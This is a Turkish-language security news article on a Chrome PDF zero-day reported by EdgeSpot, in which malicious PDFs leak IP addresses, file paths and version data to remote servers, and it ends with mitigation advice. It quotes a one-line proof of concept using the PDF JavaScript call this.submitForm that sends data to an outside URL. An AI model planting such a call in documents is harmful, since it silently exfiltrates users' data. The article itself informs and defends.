Exploit algılama servisi EdgeSpot, PDF belgelerini kullanan ilginç bir Chrome sıfır günlük güvenlik açığı keşfetti. Güvenlik açığı, saldırganların Chrome'da açılan kötü amaçlı PDF belgelerini kullanarak hassas veri toplamalarını sağlar.

Kurban ilgili PDF dosyalarını Google Chrome'da açar açmaz, kötü amaçlı bir program kullanıcı verilerini toplayarak arka planda çalışmaya başlar.

Veriler daha sonra bilgisayar korsanları tarafından kontrol edilen uzak sunucuya iletilir. Saldırganlar tarafından hangi verilerin emildiğini merak ediyor olabilirsiniz, bilgisayarınızda aşağıdaki verileri hedef alıyorlar:

• IP adresi
• PDF dosyasının sistemdeki tam yolu
• İşletim sistemi ve Chrome sürümleri

Kötü amaçlı yazılım tarafından basılan PDF dosyalarına dikkat edin

Adobe Reader, PDF dosyalarını açmak için kullanıldığında hiçbir şeyin olmadığını bilmek sizi şaşırtabilir. Ek olarak, HTTP POST istekleri, kullanıcı müdahalesi olmadan verileri uzak sunuculara aktarmak için kullanılır.

Uzmanlar, iki alandan birinin readnotifycom veya burpcollaboratornet'in verileri aldığını tespit etti.

Antivirüs yazılımının çoğu EdgeSpot tarafından tespit edilen örnekleri tespit edemediğini göz önüne alarak saldırının yoğunluğunu hayal edebilirsiniz.

Uzmanlar, saldırganların, kullanıcıların hassas bilgilerini toplamak için “this.submitForm ()” PDF Javascript API'sini kullandığını ortaya koyuyor.

Minimal PoC ile test ettik, “this.submitForm ('http://google.com/test')” gibi basit bir API çağrısı Google Chrome’un kişisel verileri google.com’a göndermesini sağlayacaktır.

Uzmanlar aslında bu Chrome hatanın iki farklı kötü niyetli PDF dosyası grubu tarafından kullanıldığını tespit etti. Her ikisi de sırasıyla Ekim 2017 ve Eylül 2018'de yayınlandı.

Özellikle, toplanan veriler, saldırganlar tarafından ileride yapılacak saldırılara ince ayar yapmak için kullanılabilir. Raporlar, ilk dosya grubunun ReadNotify'ın PDF izleme hizmeti kullanılarak derlendiğini gösteriyor.

Kullanıcılar, kullanıcı görüşlerini takip etmek için servisten faydalanabilirler. EdgeSpot, ikinci PDF dosyası grubunun doğası ile ilgili hiçbir detay paylaşmamıştır.

Nasıl Korunuruz

Exploit algılama servisi EdgeSpot, kullanıcıları Chrome kullanıcılarının olası riskler hakkında uyarmasını istedi çünkü yamanın yakın bir zamanda piyasaya sürülmesi beklenmiyordu.

EdgeSpot Google’a geçen yıl bu güvenlik açığını bildirdi ve şirket Nisan ayı sonlarında bir düzeltme eki yayınlama sözü verdi. 'H

Ancak, alternatif bir PDF okuyucu uygulamasını kullanarak alınan PDF belgelerini yerel olarak görüntüleyerek, soruna geçici bir geçici çözüm kullanmayı düşünebilirsiniz.

Alternatif olarak, sistemlerinizin İnternet bağlantısını keserek PDF belgelerinizi Chrome'da da açabilirsiniz. Bu arada, 23 Nisan’da piyasaya sürülmesi beklenen Chrome 74 güncellemesini bekleyebilirsiniz.